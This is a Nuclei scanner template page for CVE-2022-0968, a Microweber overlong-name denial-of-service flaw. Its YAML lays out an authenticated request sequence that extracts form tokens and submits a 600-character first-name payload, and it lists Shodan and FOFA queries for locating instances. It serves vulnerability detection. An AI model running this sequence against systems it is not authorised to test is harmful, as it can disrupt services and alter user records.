Skip to content
Nuclei Templates

Microweber <1.2.12 - Integer Overflow

ID: CVE-2022-0968

Severity: medium

Author: amit-jd

Tags: cve,cve2022,overflow,microweber,cms,huntr,dos

Description

Section titled “Description”

Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field ‘first & last name,’ which can allow an attacker to cause a denial of service via a crafted HTTP request.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0968


info:
  name: Microweber <1.2.12 - Integer Overflow
  author: amit-jd
  severity: medium
  description: |
    Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or denial of service.
  remediation: First name and last name input should be limited to 50 characters or maximum 100 characters.
  reference:
    - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
    - https://github.com/advisories/GHSA-5fxv-xx5p-g2fv
    - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0968
    - https://github.com/microweber/microweber/commit/80e39084729a57dfe749626c3b9d35247a14c49e
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 5.5
    cve-id: CVE-2022-0968
    cwe-id: CWE-190
    epss-score: 0.00076
    epss-percentile: 0.32297
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: microweber
    product: microweber
    shodan-query:
      - http.favicon.hash:780351152
      - http.html:"microweber"
    fofa-query:
      - body="microweber"
      - icon_hash=780351152
  tags: cve,cve2022,overflow,microweber,cms,huntr,dos
variables:
  payload: '{{repeat("A", 600)}}'


http:
  - raw:
      - |
        POST /api/user_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        username={{username}}&password={{password}}
      - |
        GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/user/2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=


    matchers:
      - type: dsl
        dsl:
          - contains(body_3,'\"first_name\":\"{{payload}}\"')
          - 'status_code_3==200'
          - 'contains(header_3,"application/json")'
        condition: and


    extractors:
      - type: regex
        name: form_token
        group: 1
        regex:
          - '<input type="hidden" name="token" value="(.*)" autocomplete="off">'
        internal: true
        part: body


      - type: regex
        name: user
        group: 1
        regex:
          - '<input type="text" class="form-control" name="username" value="(.*)">'
        internal: true
        part: body


      - type: regex
        name: email
        group: 1
        regex:
          - '<input type="email" class="form-control" name="email" value="(.*)">'
        internal: true
        part: body
# digest: 490a00463044022036e2cd79541f5332dcb733fe080d4dfe095a55bdd584afc0c21f570b73e5b5270220704306aca46b6be8560b1fe276ec600eb71245fad69aa1050a4a7f1a29f138fa:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0968.yaml"

View on Github